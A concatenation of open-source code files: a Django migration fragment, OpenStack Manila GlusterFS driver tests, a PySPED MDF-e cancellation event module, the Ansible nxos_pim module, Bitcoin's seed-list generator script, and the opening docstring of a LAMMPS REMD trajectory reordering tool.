b'Topic'), (2, b'Middle'), (3, b'Meta')])), ('enabled', models.BooleanField(default=True)), ('site', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')), ], options={ 'ordering': ('word',), }, ), migrations.AddField( model_name='bingofield', name='new_word', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bingo.NewWord'), ), migrations.RunPython(split_words), ]
agpl-3.0
bswartz/manila
manila/tests/share/drivers/test_glusterfs.py
1
19168
# Copyright (c) 2014 Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import socket import ddt import mock from oslo_config import cfg from manila import context from manila import exception from manila.share import configuration as config from manila.share.drivers import ganesha from manila.share.drivers import glusterfs from manila.share.drivers.glusterfs import layout from manila import test from manila.tests import fake_share from manila.tests import fake_utils CONF = cfg.CONF fake_gluster_manager_attrs = { 'export': '127.0.0.1:/testvol', 'host': '127.0.0.1', 'qualified': 'testuser@127.0.0.1:/testvol', 'user': 'testuser', 'volume': 'testvol', 'path_to_private_key': '/fakepath/to/privatekey', 'remote_server_password': 'fakepassword', } fake_share_name = 'fakename' NFS_EXPORT_DIR = 'nfs.export-dir' NFS_EXPORT_VOL = 'nfs.export-volumes' NFS_RPC_AUTH_ALLOW = 'nfs.rpc-auth-allow' NFS_RPC_AUTH_REJECT = 'nfs.rpc-auth-reject' @ddt.ddt class GlusterfsShareDriverTestCase(test.TestCase): """Tests GlusterfsShareDriver.""" def setUp(self): super(GlusterfsShareDriverTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) self._execute = fake_utils.fake_execute self._context = context.get_admin_context() self.addCleanup(fake_utils.fake_execute_set_repliers, []) self.addCleanup(fake_utils.fake_execute_clear_log) CONF.set_default('reserved_share_percentage', 50) CONF.set_default('driver_handles_share_servers', False) self.fake_conf = config.Configuration(None) self._driver = glusterfs.GlusterfsShareDriver( execute=self._execute, configuration=self.fake_conf) self.share = fake_share.fake_share(share_proto='NFS') def test_do_setup(self): self.mock_object(self._driver, '_get_helper') self.mock_object(layout.GlusterfsShareDriverBase, 'do_setup') _context = mock.Mock() self._driver.do_setup(_context) self._driver._get_helper.assert_called_once_with() layout.GlusterfsShareDriverBase.do_setup.assert_called_once_with( _context) @ddt.data(True, False) def test_setup_via_manager(self, has_parent): gmgr = mock.Mock() share_mgr_parent = mock.Mock() if has_parent else None nfs_helper = mock.Mock() nfs_helper.get_export = mock.Mock(return_value='host:/vol') self._driver.nfs_helper = mock.Mock(return_value=nfs_helper) ret = self._driver._setup_via_manager( {'manager': gmgr, 'share': self.share}, share_manager_parent=share_mgr_parent) gmgr.set_vol_option.assert_called_once_with( 'nfs.export-volumes', False) self._driver.nfs_helper.assert_called_once_with( self._execute, self.fake_conf, gluster_manager=gmgr) nfs_helper.get_export.assert_called_once_with(self.share) self.assertEqual('host:/vol', ret) @ddt.data({'helpercls': None, 'path': '/fakepath'}, {'helpercls': None, 'path': None}, {'helpercls': glusterfs.GlusterNFSHelper, 'path': '/fakepath'}, {'helpercls': glusterfs.GlusterNFSHelper, 'path': None}) @ddt.unpack def test_setup_via_manager_path(self, helpercls, path): gmgr = mock.Mock() gmgr.path = path if not helpercls: helper = mock.Mock() helper.get_export = mock.Mock(return_value='host:/vol') helpercls = mock.Mock(return_value=helper) self._driver.nfs_helper = helpercls if helpercls == glusterfs.GlusterNFSHelper and path is None: gmgr.get_vol_option = mock.Mock(return_value=True) self._driver._setup_via_manager( {'manager': gmgr, 'share': self.share}) if helpercls == glusterfs.GlusterNFSHelper and path is None: gmgr.get_vol_option.assert_called_once_with( NFS_EXPORT_VOL, boolean=True) args = (NFS_RPC_AUTH_REJECT, '*') else: args = (NFS_EXPORT_VOL, False) gmgr.set_vol_option.assert_called_once_with(*args) def test_setup_via_manager_export_volumes_off(self): gmgr = mock.Mock() gmgr.path = None gmgr.get_vol_option = mock.Mock(return_value=False) self._driver.nfs_helper = glusterfs.GlusterNFSHelper self.assertRaises(exception.GlusterfsException, self._driver._setup_via_manager, {'manager': gmgr, 'share': self.share}) gmgr.get_vol_option.assert_called_once_with(NFS_EXPORT_VOL, boolean=True) def test_check_for_setup_error(self): self._driver.check_for_setup_error() def test_update_share_stats(self): self.mock_object(layout.GlusterfsShareDriverBase, '_update_share_stats') self._driver._update_share_stats() (layout.GlusterfsShareDriverBase._update_share_stats. assert_called_once_with({'storage_protocol': 'NFS', 'vendor_name': 'Red Hat', 'share_backend_name': 'GlusterFS', 'reserved_percentage': 50})) def test_get_network_allocations_number(self): self.assertEqual(0, self._driver.get_network_allocations_number()) def test_get_helper(self): ret = self._driver._get_helper() self.assertIsInstance(ret, self._driver.nfs_helper) @ddt.data({'path': '/fakepath', 'helper': glusterfs.GlusterNFSHelper}, {'path': None, 'helper': glusterfs.GlusterNFSVolHelper}) @ddt.unpack def test_get_helper_vol(self, path, helper): self._driver.nfs_helper = glusterfs.GlusterNFSHelper gmgr = mock.Mock(path=path) ret = self._driver._get_helper(gmgr) self.assertIsInstance(ret, helper) @ddt.data('type', 'level') def test_supported_access_features(self, feature): nfs_helper = mock.Mock() supported_access_feature = mock.Mock() setattr(nfs_helper, 'supported_access_%ss' % feature, supported_access_feature) self.mock_object(self._driver, 'nfs_helper', nfs_helper) ret = getattr(self._driver, 'supported_access_%ss' % feature) self.assertEqual(supported_access_feature, ret) def test_update_access_via_manager(self): self.mock_object(self._driver, '_get_helper') gmgr = mock.Mock() add_rules = mock.Mock() delete_rules = mock.Mock() self._driver._update_access_via_manager( gmgr, self._context, self.share, add_rules, delete_rules, recovery=True) self._driver._get_helper.assert_called_once_with(gmgr) self._driver._get_helper().update_access.assert_called_once_with( '/', self.share, add_rules, delete_rules, recovery=True) @ddt.ddt class GlusterNFSHelperTestCase(test.TestCase): """Tests GlusterNFSHelper.""" def setUp(self): super(GlusterNFSHelperTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self.fake_conf = config.Configuration(None) self._helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_manager) def test_get_export(self): ret = self._helper.get_export(mock.Mock()) self.assertEqual(fake_gluster_manager_attrs['export'], ret) @ddt.data({'output_str': '/foo(10.0.0.1|10.0.0.2),/bar(10.0.0.1)', 'expected': {'foo': ['10.0.0.1', '10.0.0.2'], 'bar': ['10.0.0.1']}}, {'output_str': None, 'expected': {}}) @ddt.unpack def test_get_export_dir_dict(self, output_str, expected): self.mock_object(self._helper.gluster_manager, 'get_vol_option', mock.Mock(return_value=output_str)) ret = self._helper._get_export_dir_dict() self.assertEqual(expected, ret) (self._helper.gluster_manager.get_vol_option. assert_called_once_with(NFS_EXPORT_DIR)) @ddt.data({'delta': (['10.0.0.2'], []), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1|10.0.0.2)'}, {'delta': (['10.0.0.1'], []), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1)'}, {'delta': ([], ['10.0.0.2']), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1)'}, {'delta': ([], ['10.0.0.1']), 'extra_exports': {}, 'new_exports': None}, {'delta': ([], ['10.0.0.1']), 'extra_exports': {'elsewhere': ['10.0.1.3']}, 'new_exports': '/elsewhere(10.0.1.3)'}) @ddt.unpack def test_update_access(self, delta, extra_exports, new_exports): gluster_manager_attrs = {'path': '/fakename'} gluster_manager_attrs.update(fake_gluster_manager_attrs) gluster_mgr = mock.Mock(**gluster_manager_attrs) helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_mgr) export_dir_dict = {'fakename': ['10.0.0.1']} export_dir_dict.update(extra_exports) helper._get_export_dir_dict = mock.Mock(return_value=export_dir_dict) _share = mock.Mock() add_rules, delete_rules = ( map(lambda a: {'access_to': a}, r) for r in delta) helper.update_access('/', _share, add_rules, delete_rules) helper._get_export_dir_dict.assert_called_once_with() gluster_mgr.set_vol_option.assert_called_once_with(NFS_EXPORT_DIR, new_exports) @ddt.data({}, {'elsewhere': '10.0.1.3'}) def test_update_access_disjoint(self, export_dir_dict): gluster_manager_attrs = {'path': '/fakename'} gluster_manager_attrs.update(fake_gluster_manager_attrs) gluster_mgr = mock.Mock(**gluster_manager_attrs) helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_mgr) helper._get_export_dir_dict = mock.Mock(return_value=export_dir_dict) _share = mock.Mock() helper.update_access('/', _share, [], [{'access_to': '10.0.0.2'}]) helper._get_export_dir_dict.assert_called_once_with() self.assertFalse(gluster_mgr.set_vol_option.called) @ddt.ddt class GlusterNFSVolHelperTestCase(test.TestCase): """Tests GlusterNFSVolHelper.""" def setUp(self): super(GlusterNFSVolHelperTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self.fake_conf = config.Configuration(None) self._helper = glusterfs.GlusterNFSVolHelper( self._execute, self.fake_conf, gluster_manager=gluster_manager) @ddt.data({'output_str': '10.0.0.1,10.0.0.2', 'expected': ['10.0.0.1', '10.0.0.2']}, {'output_str': None, 'expected': []}) @ddt.unpack def test_get_vol_exports(self, output_str, expected): self.mock_object(self._helper.gluster_manager, 'get_vol_option', mock.Mock(return_value=output_str)) ret = self._helper._get_vol_exports() self.assertEqual(expected, ret) (self._helper.gluster_manager.get_vol_option. assert_called_once_with(NFS_RPC_AUTH_ALLOW)) @ddt.data({'delta': (["10.0.0.1"], []), 'expected': "10.0.0.1,10.0.0.3"}, {'delta': (["10.0.0.2"], []), 'expected': "10.0.0.1,10.0.0.2,10.0.0.3"}, {'delta': ([], ["10.0.0.1"]), 'expected': "10.0.0.3"}, {'delta': ([], ["10.0.0.2"]), 'expected': "10.0.0.1,10.0.0.3"}) @ddt.unpack def test_update_access(self, delta, expected): self.mock_object(self._helper, '_get_vol_exports', mock.Mock( return_value=["10.0.0.1", "10.0.0.3"])) _share = mock.Mock() add_rules, delete_rules = ( map(lambda a: {'access_to': a}, r) for r in delta) self._helper.update_access("/", _share, add_rules, delete_rules) self._helper._get_vol_exports.assert_called_once_with() argseq = [(NFS_RPC_AUTH_ALLOW, expected), (NFS_RPC_AUTH_REJECT, None)] self.assertEqual( [mock.call(*a) for a in argseq], self._helper.gluster_manager.set_vol_option.call_args_list) def test_update_access_empty(self): self.mock_object(self._helper, '_get_vol_exports', mock.Mock( return_value=["10.0.0.1"])) _share = mock.Mock() self._helper.update_access("/", _share, [], [{'access_to': "10.0.0.1"}]) self._helper._get_vol_exports.assert_called_once_with() argseq = [(NFS_RPC_AUTH_ALLOW, None), (NFS_RPC_AUTH_REJECT, "*")] self.assertEqual( [mock.call(*a) for a in argseq], self._helper.gluster_manager.set_vol_option.call_args_list) class GaneshaNFSHelperTestCase(test.TestCase): """Tests GaneshaNFSHelper.""" def setUp(self): super(GaneshaNFSHelperTestCase, self).setUp() self.gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self._root_execute = mock.Mock(return_value=('', '')) self.access = fake_share.fake_access() self.fake_conf = config.Configuration(None) self.fake_template = {'key': 'value'} self.share = fake_share.fake_share() self.mock_object(glusterfs.ganesha_utils, 'RootExecutor', mock.Mock(return_value=self._root_execute)) self.mock_object(glusterfs.ganesha.GaneshaNASHelper, '__init__', mock.Mock()) socket.gethostname = mock.Mock(return_value='example.com') self._helper = glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) self._helper.tag = 'GLUSTER-Ganesha-localhost' def test_init_local_ganesha_server(self): glusterfs.ganesha_utils.RootExecutor.assert_called_once_with( self._execute) socket.gethostname.assert_has_calls([mock.call()]) glusterfs.ganesha.GaneshaNASHelper.__init__.assert_has_calls( [mock.call(self._root_execute, self.fake_conf, tag='GLUSTER-Ganesha-example.com')]) def test_get_export(self): ret = self._helper.get_export(self.share) self.assertEqual('example.com:/fakename--<access-id>', ret) def test_init_remote_ganesha_server(self): ssh_execute = mock.Mock(return_value=('', '')) CONF.set_default('glusterfs_ganesha_server_ip', 'fakeip') self.mock_object(glusterfs.ganesha_utils, 'SSHExecutor', mock.Mock(return_value=ssh_execute)) glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) glusterfs.ganesha_utils.SSHExecutor.assert_called_once_with( 'fakeip', 22, None, 'root', password=None, privatekey=None) glusterfs.ganesha.GaneshaNASHelper.__init__.assert_has_calls( [mock.call(ssh_execute, self.fake_conf, tag='GLUSTER-Ganesha-fakeip')]) def test_init_helper(self): ganeshelper = mock.Mock() exptemp = mock.Mock() def set_attributes(*a, **kw): self._helper.ganesha = ganeshelper self._helper.export_template = exptemp self.mock_object(ganesha.GaneshaNASHelper, 'init_helper', mock.Mock(side_effect=set_attributes)) self.assertEqual({}, glusterfs.GaneshaNFSHelper.shared_data) self._helper.init_helper() ganesha.GaneshaNASHelper.init_helper.assert_called_once_with() self.assertEqual(ganeshelper, self._helper.ganesha) self.assertEqual(exptemp, self._helper.export_template) self.assertEqual({ 'GLUSTER-Ganesha-localhost': { 'ganesha': ganeshelper, 'export_template': exptemp}}, glusterfs.GaneshaNFSHelper.shared_data) other_helper = glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) other_helper.tag = 'GLUSTER-Ganesha-localhost' other_helper.init_helper() self.assertEqual(ganeshelper, other_helper.ganesha) self.assertEqual(exptemp, other_helper.export_template) def test_default_config_hook(self): fake_conf_dict = {'key': 'value1'} mock_ganesha_utils_patch = mock.Mock() def fake_patch_run(tmpl1, tmpl2): mock_ganesha_utils_patch( copy.deepcopy(tmpl1), tmpl2) tmpl1.update(tmpl2) self.mock_object(glusterfs.ganesha.GaneshaNASHelper, '_default_config_hook', mock.Mock(return_value=self.fake_template)) self.mock_object(glusterfs.ganesha_utils, 'path_from', mock.Mock(return_value='/fakedir/glusterfs/conf')) self.mock_object(self._helper, '_load_conf_dir', mock.Mock(return_value=fake_conf_dict)) self.mock_object(glusterfs.ganesha_utils, 'patch', mock.Mock(side_effect=fake_patch_run)) ret = self._helper._default_config_hook() (glusterfs.ganesha.GaneshaNASHelper._default_config_hook. assert_called_once_with()) glusterfs.ganesha_utils.path_from.assert_called_once_with( glusterfs.__file__, 'conf') self._helper._load_conf_dir.assert_called_once_with( '/fakedir/glusterfs/conf') glusterfs.ganesha_utils.patch.assert_called_once_with( self.fake_template, fake_conf_dict) self.assertEqual(fake_conf_dict, ret) def test_fsal_hook(self): self._helper.gluster_manager.path = '/fakename' output = { 'Hostname': '127.0.0.1', 'Volume': 'testvol', 'Volpath': '/fakename' } ret = self._helper._fsal_hook('/fakepath', self.share, self.access) self.assertEqual(output, ret)
apache-2.0
aricaldeira/PySPED
pysped/mdfe/leiaute/evtcancmdfe_300.py
1
4864
# -*- coding: utf-8 -*- # # PySPED - Python libraries to deal with Brazil's SPED Project # # Copyright (C) 2010-2012 # Copyright (C) Aristides Caldeira <aristides.caldeira at tauga.com.br> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Library General Public License as # published by the Free Software Foundation, either version 2.1 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library General Public License for more details. # # You should have received a copy of the GNU Library General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # PySPED - Bibliotecas Python para o # SPED - Sistema Público de Escrituração Digital # # Copyright (C) 2010-2012 # Copyright (C) Aristides Caldeira <aristides.caldeira arroba tauga.com.br> # # Este programa é um software livre: você pode redistribuir e/ou modificar # este programa sob os termos da licença GNU Library General Public License, # publicada pela Free Software Foundation, em sua versão 2.1 ou, de acordo # com sua opção, qualquer versão posterior. # # Este programa é distribuido na esperança de que venha a ser útil, # porém SEM QUAISQUER GARANTIAS, nem mesmo a garantia implícita de # COMERCIABILIDADE ou ADEQUAÇÃO A UMA FINALIDADE ESPECÍFICA. Veja a # GNU Library General Public License para mais detalhes. # # Você deve ter recebido uma cópia da GNU Library General Public License # juntamente com este programa. Caso esse não seja o caso, acesse: # <http://www.gnu.org/licenses/> # from __future__ import division, print_function, unicode_literals import os from pysped.xml_sped import TagCaracter, XMLNFe, NAMESPACE_MDFE from pysped.mdfe.leiaute import ESQUEMA_ATUAL_VERSAO_3 as ESQUEMA_ATUAL from pysped.mdfe.leiaute.eventomdfe_300 import * DIRNAME = os.path.dirname(__file__) class EvCancMDFe(DetEvento): def __init__(self): super(EvCancMDFe, self).__init__() self.descEvento = TagCaracter(nome='descEvento', tamanho=[ 5, 60, 5], raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False, valor='Cancelamento') self.nProt = TagCaracter(nome='nProt' , tamanho=[15, 15, 15], raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False) self.xJust = TagCaracter(nome='xJust' , tamanho=[15, 255] , raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False) def get_xml(self): xml = '<evCancMDFe>' xml += self.descEvento.xml xml += self.nProt.xml xml += self.xJust.xml xml += '</evCancMDFe>' return xml def set_xml(self, arquivo): if self._le_xml(arquivo): self.descEvento.xml = arquivo self.nProt.xml = arquivo self.xJust.xml = arquivo xml = property(get_xml, set_xml) class DetEventoCancMDFe(DetEvento): def __init__(self): super(DetEventoCancMDFe, self).__init__() self.evCancMDFe = EvCancMDFe() def get_xml(self): xml = self.versaoEvento.xml xml += self.evCancMDFe.xml xml += '</detEvento>' return xml def set_xml(self, arquivo): if self._le_xml(arquivo): self.versaoEvento.xml = arquivo self.evCancMDFe.xml = arquivo xml = property(get_xml, set_xml) @property def texto_formatado(self): txt = '<b>Motivo do cancelamento:</b><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;' + self.evCancMDFe.xJust.valor txt += '<br/><br/>' return txt class InfEventoCancMDFe(InfEvento): def __init__(self): super(InfEventoCancMDFe, self).__init__() self.detEvento = DetEventoCancMDFe() self.tpEvento.valor = '110111' class EventoCancMDFe(Evento): def __init__(self): super(EventoCancMDFe, self).__init__() self.infEvento = InfEventoCancMDFe() self.caminho_esquema = os.path.join(DIRNAME, 'schema/', ESQUEMA_ATUAL + '/') self.arquivo_esquema = 'evCancMDFe_v3.00.xsd' class InfEventoRecebidoCancMDFe(InfEventoRecebido): def __init__(self): super(InfEventoRecebidoCancMDFe, self).__init__() class RetEventoCancMDFe(RetEvento): def __init__(self): super(RetEventoCancMDFe, self).__init__() class ProcEventoCancMDFe(ProcEvento): def __init__(self): super(ProcEventoCancMDFe, self).__init__() self.eventoMDFe = EventoCancMDFe() self.retEventoMDFe = RetEventoCancMDFe() self.caminho_esquema = os.path.join(DIRNAME, 'schema', ESQUEMA_ATUAL + '/') self.arquivo_esquema = 'procEventoCancMDFe_v3.00.xsd'
lgpl-2.1
ganeshnalawade/ansible-modules-core
network/nxos/nxos_pim.py
27
9694
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # DOCUMENTATION = ''' --- module: nxos_pim version_added: "2.2" short_description: Manages configuration of a PIM instance. description: - Manages configuration of a Protocol Independent Multicast (PIM) instance. author: Gabriele Gerbino (@GGabriele) extends_documentation_fragment: nxos options: ssm_range: description: - Configure group ranges for Source Specific Multicast (SSM). Valid values are multicast addresses or the keyword 'none'. required: true ''' EXAMPLES = ''' - nxos_pim: ssm_range: "232.0.0.0/8" username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: verbose mode type: dict sample: {"ssm_range": "232.0.0.0/8"} existing: description: k/v pairs of existing PIM configuration returned: verbose mode type: dict sample: {"ssm_range": none} end_state: description: k/v pairs of BGP configuration after module execution returned: verbose mode type: dict sample: {"ssm_range": "232.0.0.0/8"} updates: description: commands sent to the device returned: always type: list sample: ["ip pim ssm range 232.0.0.0/8"] changed: description: check to see if a change was made on the device returned: always type: boolean sample: true ''' # COMMON CODE FOR MIGRATION import re from ansible.module_utils.basic import get_exception from ansible.module_utils.netcfg import NetworkConfig, ConfigLine from ansible.module_utils.shell import ShellError try: from ansible.module_utils.nxos import get_module except ImportError: from ansible.module_utils.nxos import NetworkModule def to_list(val): if isinstance(val, (list, tuple)): return list(val) elif val is not None: return [val] else: return list() class CustomNetworkConfig(NetworkConfig): def expand_section(self, configobj, S=None): if S is None: S = list() S.append(configobj) for child in configobj.children: if child in S: continue self.expand_section(child, S) return S def get_object(self, path): for item in self.items: if item.text == path[-1]: parents = [p.text for p in item.parents] if parents == path[:-1]: return item def to_block(self, section): return '\n'.join([item.raw for item in section]) def get_section(self, path): try: section = self.get_section_objects(path) return self.to_block(section) except ValueError: return list() def get_section_objects(self, path): if not isinstance(path, list): path = [path] obj = self.get_object(path) if not obj: raise ValueError('path does not exist in config') return self.expand_section(obj) def add(self, lines, parents=None): """Adds one or lines of configuration """ ancestors = list() offset = 0 obj = None ## global config command if not parents: for line in to_list(lines): item = ConfigLine(line) item.raw = line if item not in self.items: self.items.append(item) else: for index, p in enumerate(parents): try: i = index + 1 obj = self.get_section_objects(parents[:i])[0] ancestors.append(obj) except ValueError: # add parent to config offset = index * self.indent obj = ConfigLine(p) obj.raw = p.rjust(len(p) + offset) if ancestors: obj.parents = list(ancestors) ancestors[-1].children.append(obj) self.items.append(obj) ancestors.append(obj) # add child objects for line in to_list(lines): # check if child already exists for child in ancestors[-1].children: if child.text == line: break else: offset = len(parents) * self.indent item = ConfigLine(line) item.raw = line.rjust(len(line) + offset) item.parents = ancestors ancestors[-1].children.append(item) self.items.append(item) def get_network_module(**kwargs): try: return get_module(**kwargs) except NameError: return NetworkModule(**kwargs) def get_config(module, include_defaults=False): config = module.params['config'] if not config: try: config = module.get_config() except AttributeError: defaults = module.params['include_defaults'] config = module.config.get_config(include_defaults=defaults) return CustomNetworkConfig(indent=2, contents=config) def load_config(module, candidate): config = get_config(module) commands = candidate.difference(config) commands = [str(c).strip() for c in commands] save_config = module.params['save'] result = dict(changed=False) if commands: if not module.check_mode: try: module.configure(commands) except AttributeError: module.config(commands) if save_config: try: module.config.save_config() except AttributeError: module.execute(['copy running-config startup-config']) result['changed'] = True result['updates'] = commands return result # END OF COMMON CODE PARAM_TO_COMMAND_KEYMAP = { 'ssm_range': 'ip pim ssm range' } PARAM_TO_DEFAULT_KEYMAP = {} WARNINGS = [] def invoke(name, *args, **kwargs): func = globals().get(name) if func: return func(*args, **kwargs) def get_value(arg, config, module): REGEX = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(PARAM_TO_COMMAND_KEYMAP[arg]), re.M) value = '' if PARAM_TO_COMMAND_KEYMAP[arg] in config: value = REGEX.search(config).group('value') return value def get_existing(module, args): existing = {} config = str(get_config(module)) for arg in args: existing[arg] = get_value(arg, config, module) return existing def apply_key_map(key_map, table): new_dict = {} for key, value in table.items(): new_key = key_map.get(key) if new_key: value = table.get(key) if value: new_dict[new_key] = value else: new_dict[new_key] = value return new_dict def get_commands(module, existing, proposed, candidate): commands = list() proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed) existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing) for key, value in proposed_commands.iteritems(): command = '{0} {1}'.format(key, value) commands.append(command) if commands: candidate.add(commands, parents=[]) def main(): argument_spec = dict( ssm_range=dict(required=True, type='str'), m_facts=dict(required=False, default=False, type='bool'), include_defaults=dict(default=False), config=dict(), save=dict(type='bool', default=False) ) module = get_network_module(argument_spec=argument_spec, supports_check_mode=True) splitted_ssm_range = module.params['ssm_range'].split('.') if len(splitted_ssm_range) != 4 and module.params['ssm_range'] != 'none': module.fail_json(msg="Valid ssm_range values are multicast addresses " "or the keyword 'none'.") args = [ 'ssm_range' ] existing = invoke('get_existing', module, args) end_state = existing proposed = dict((k, v) for k, v in module.params.iteritems() if v is not None and k in args) result = {} candidate = CustomNetworkConfig(indent=3) invoke('get_commands', module, existing, proposed, candidate) try: response = load_config(module, candidate) result.update(response) except ShellError: exc = get_exception() module.fail_json(msg=str(exc)) result['connected'] = module.connected if module._verbosity > 0: end_state = invoke('get_existing', module, args) result['end_state'] = end_state result['existing'] = existing result['proposed'] = proposed if WARNINGS: result['warnings'] = WARNINGS module.exit_json(**result) if __name__ == '__main__': main()
gpl-3.0
jakeva/bitcoin-pwcheck
share/seeds/generate-seeds.py
79
4297
#!/usr/bin/python # Copyright (c) 2014 Wladmir J. van der Laan # Distributed under the MIT software license, see the accompanying # file COPYING or http://www.opensource.org/licenses/mit-license.php. ''' Script to generate list of seed nodes for chainparams.cpp. This script expects two text files in the directory that is passed as an argument: nodes_main.txt nodes_test.txt These files must consist of lines in the format <ip> <ip>:<port> [<ipv6>] [<ipv6>]:<port> <onion>.onion 0xDDBBCCAA (IPv4 little-endian old pnSeeds format) The output will be two data structures with the peers in binary format: static SeedSpec6 pnSeed6_main[]={ ... } static SeedSpec6 pnSeed6_test[]={ ... } These should be pasted into `src/chainparamsseeds.h`. ''' from __future__ import print_function, division from base64 import b32decode from binascii import a2b_hex import sys, os import re # ipv4 in ipv6 prefix pchIPv4 = bytearray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0xff, 0xff]) # tor-specific ipv6 prefix pchOnionCat = bytearray([0xFD,0x87,0xD8,0x7E,0xEB,0x43]) def name_to_ipv6(addr): if len(addr)>6 and addr.endswith('.onion'): vchAddr = b32decode(addr[0:-6], True) if len(vchAddr) != 16-len(pchOnionCat): raise ValueError('Invalid onion %s' % s) return pchOnionCat + vchAddr elif '.' in addr: # IPv4 return pchIPv4 + bytearray((int(x) for x in addr.split('.'))) elif ':' in addr: # IPv6 sub = [[], []] # prefix, suffix x = 0 addr = addr.split(':') for i,comp in enumerate(addr): if comp == '': if i == 0 or i == (len(addr)-1): # skip empty component at beginning or end continue x += 1 # :: skips to suffix assert(x < 2) else: # two bytes per component val = int(comp, 16) sub[x].append(val >> 8) sub[x].append(val & 0xff) nullbytes = 16 - len(sub[0]) - len(sub[1]) assert((x == 0 and nullbytes == 0) or (x == 1 and nullbytes > 0)) return bytearray(sub[0] + ([0] * nullbytes) + sub[1]) elif addr.startswith('0x'): # IPv4-in-little-endian return pchIPv4 + bytearray(reversed(a2b_hex(addr[2:]))) else: raise ValueError('Could not parse address %s' % addr) def parse_spec(s, defaultport): match = re.match('\[([0-9a-fA-F:]+)\](?::([0-9]+))?$', s) if match: # ipv6 host = match.group(1) port = match.group(2) else: (host,_,port) = s.partition(':') if not port: port = defaultport else: port = int(port) host = name_to_ipv6(host) return (host,port) def process_nodes(g, f, structname, defaultport): g.write('static SeedSpec6 %s[] = {\n' % structname) first = True for line in f: comment = line.find('#') if comment != -1: line = line[0:comment] line = line.strip() if not line: continue if not first: g.write(',\n') first = False (host,port) = parse_spec(line, defaultport) hoststr = ','.join(('0x%02x' % b) for b in host) g.write(' {{%s}, %i}' % (hoststr, port)) g.write('\n};\n') def main(): if len(sys.argv)<2: print(('Usage: %s <path_to_nodes_txt>' % sys.argv[0]), file=sys.stderr) exit(1) g = sys.stdout indir = sys.argv[1] g.write('#ifndef BITCOIN_CHAINPARAMSSEEDS_H\n') g.write('#define BITCOIN_CHAINPARAMSSEEDS_H\n') g.write('/**\n') g.write(' * List of fixed seed nodes for the bitcoin network\n') g.write(' * AUTOGENERATED by share/seeds/generate-seeds.py\n') g.write(' *\n') g.write(' * Each line contains a 16-byte IPv6 address and a port.\n') g.write(' * IPv4 as well as onion addresses are wrapped inside a IPv6 address accordingly.\n') g.write(' */\n') with open(os.path.join(indir,'nodes_main.txt'),'r') as f: process_nodes(g, f, 'pnSeed6_main', 8333) g.write('\n') with open(os.path.join(indir,'nodes_test.txt'),'r') as f: process_nodes(g, f, 'pnSeed6_test', 18333) g.write('#endif // BITCOIN_CHAINPARAMSSEEDS_H\n') if __name__ == '__main__': main()
mit
PabloPiaggi/lammps
tools/replica/reorder_remd_traj.py
3
20165
#!/usr/bin/env python """ LAMMPS Replica Exchange Molecular Dynamics (REMD) trajectories are arranged by replica, i.e., each trajectory is a continuous replica that records all the ups and downs in temperature. However, often the requirement is trajectories that are continuous in temperature, which is achieved by this tool. Author: Tanmoy Sanyal, Shell lab, Chemical Engineering, UC Santa Barbara Email: tanmoy dot 7989 at gmail dot com Usage ----- To get detailed information about the arguments, flags, etc use: python reorder_remd_traj.py -h or python reorder_remd_traj.py --help Features of this script ----------------------- a) reorder LAMMPS REMD trajectories by temperature keeping only desired frames. Note: this only handles LAMMPS format trajectories (i.e. .lammpstrj format) Trajectories can be gzipped or bz2-compressed. The trajectories are assumed to be named as <prefix>.%d.lammpstrj[.gz or .bz2] b) (optionally) calculate configurational weights for each frame at each temperature if potential energies are supplied. But this if for the canonical (NVT) ensemble 